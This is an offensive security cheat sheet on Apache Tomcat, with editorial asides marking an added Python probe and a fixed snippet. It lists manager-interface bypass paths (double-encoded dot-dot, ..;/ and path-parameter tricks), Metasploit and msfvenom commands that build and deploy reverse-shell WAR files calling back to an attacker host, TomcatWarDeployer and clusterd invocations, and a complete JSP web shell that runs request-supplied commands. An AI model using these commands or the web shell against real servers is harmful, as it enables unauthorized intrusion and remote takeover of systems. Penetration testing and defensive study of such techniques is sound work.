Exploitation
Common Vulnerabilities
Password Disclosure in Stack Traces
Requesting /auth.jsp on some installations makes Tomcat answer with a Java stack trace, and the trace can contain the credentials the page was using. Request it directly and read the error page.
Double URL Encoding
CVE-2007-1860 is a double-decoding bug in the mod_jk connector (1.2.0 to 1.2.22): the front end decodes the path once before applying its access rules and again before forwarding, so a dot-dot segment encoded twice slips past a rule that blocks /manager/ and still normalises to the management interface on the back end:
pathTomcat/%252E%252E/manager/html
Here pathTomcat is any context that already exists on the server.
Insecure Example Scripts
Apache Tomcat versions 4.x to 7.x ship example applications that are susceptible to XSS or information disclosure. Examples:
/examples/jsp/num/numguess.jsp
/examples/servlet/HelloWorldExample
Check whether these paths are reachable and restrict or remove them.
Path Traversal
Tomcat strips path parameters (everything from ; to the next /) before it routes a request, while most reverse proxies in front of it do not. A proxy rule that blocks /manager/ therefore never matches the following, yet Tomcat normalises both to /manager/html:
http://<tomcat_target_ip>/lalala/..;/manager/html
or
http://<tomcat_target_ip>/;param=value/manager/html
A 401 response to one of these (rather than the proxy's 403 or a 404) means the request reached the manager's authentication realm, so the bypass worked and only credentials stand in the way.
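The probe below, added here and not part of the original page, sends the plain manager request and the bypass shapes above to a target and classifies each response so the 401-means-reached signal is explicit. It assumes a base URL such as http://10.10.10.10:8080 and uses /examples as the existing context for the double-encoded variant; both are placeholders.

```python
"""Probe whether Tomcat's manager is reachable past a front-end path filter.

Added example (not from the page). Assumes a base URL like http://host:8080
and an existing context (/examples here) for the double-encoded variant.
"""
import urllib.error
import urllib.request

# (label, path) pairs. "direct" is the control request; the others are the
# bypass shapes discussed in the text: Tomcat path-parameter stripping and
# the double-encoded dot-dot that an old mod_jk decoded twice (CVE-2007-1860).
BYPASS_PATHS = [
    ("direct", "/manager/html"),
    ("semicolon-dotdot", "/lalala/..;/manager/html"),
    ("path-param", "/;param=value/manager/html"),
    ("double-encoded-dotdot", "/examples/%252E%252E/manager/html"),
]


def build_urls(base_url, paths=BYPASS_PATHS):
    """Join each candidate path to the base URL without touching the encoding."""
    base = base_url.rstrip("/")
    return [(label, base + path) for label, path in paths]


def classify(status):
    """Translate an HTTP status into what it says about the manager app.

    401 -> reached the manager's BASIC-auth realm: the filter was bypassed
    200 -> manager served without authentication
    403 -> reached a filter (proxy ACL, RemoteAddrValve) and was refused
    404 -> path was normalised away upstream or the manager is not deployed
    """
    return {
        401: "reached-manager-auth",
        200: "reached-manager-open",
        403: "blocked",
        404: "not-found",
    }.get(status, f"other-{status}")


def probe(base_url, paths=BYPASS_PATHS, timeout=5):
    """Request every candidate URL and return {label: classification}."""
    results = {}
    for label, url in build_urls(base_url, paths):
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                status = resp.status
        except urllib.error.HTTPError as err:
            status = err.code
        except urllib.error.URLError as err:
            results[label] = f"error-{err.reason}"
            continue
        results[label] = classify(status)
    return results


if __name__ == "__main__":
    import sys
    for label, verdict in probe(sys.argv[1]).items():
        print(f"{label:24} {verdict}")
```

Compare the "direct" row with the bypass rows: "blocked" or "not-found" for direct and "reached-manager-auth" for a bypass shape is the pattern that indicates a proxy-level ACL rather than a Tomcat-level restriction.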
Using Metasploit Framework
The tomcat_mgr_upload exploit in Metasploit deploys a WAR through the manager application using valid credentials. Launch Metasploit and execute the following commands (the module is selected by its full path rather than by a search index, since the index depends on what the search returns; LHOST is the address the reverse payload connects back to):
msfconsole -q
use exploit/multi/http/tomcat_mgr_upload
set rhosts <tomcat_target_ip>
set rport 8080
set httpusername admin
set httppassword password
set payload linux/x86/meterpreter_reverse_tcp
set lhost <attacker_ip>
exploit
After exploitation, a reverse connection is obtained and commands can be run through the Meterpreter shell. Pick a payload that matches the module's selected target (Java, Windows or Linux).
Remote Code Execution (RCE)
If you gain access to the /manager/html interface, you can upload and deploy a .war file to achieve RCE.
Example:
curl --upload-file shell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/shell"
Note that /manager/text requires the manager-script role, while the /manager/html form requires manager-gui; an account with only manager-gui gets a 403 from the text interface and must use the HTML upload form instead, which additionally expects the CSRF nonce that the HTML interface issues.
Metasploit can automate this:
use exploit/multi/http/tomcat_mgr_upload
To create a reverse shell WAR file:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o shell.war
Other Methods
TomcatWarDeployer
Deploy reverse or bind shells via:
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
Clusterd
Automate testing:
clusterd.py -i <attacker_machine> -a tomcat -v 5.5 --gen-payload <tomcat_target_ip>:4444 --deploy shell.war
Manual Web Shell
Example JSP for command execution (the loop variable s is declared here; the original snippet used it without a declaration and would not compile):
<FORM METHOD=GET ACTION='index.jsp'>
  <INPUT name='cmd' type=text>
  <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
  String cmd = request.getParameter("cmd");
  String output = "";
  if (cmd != null) {
    // Run the command and collect its standard output line by line.
    Process p = Runtime.getRuntime().exec(cmd, null, null);
    BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String s;
    while ((s = sI.readLine()) != null) {
      output += s + "</br>";
    }
  }
%>
<pre><%=output %></pre>
Save it as index.jsp, package it into a WAR file and upload it.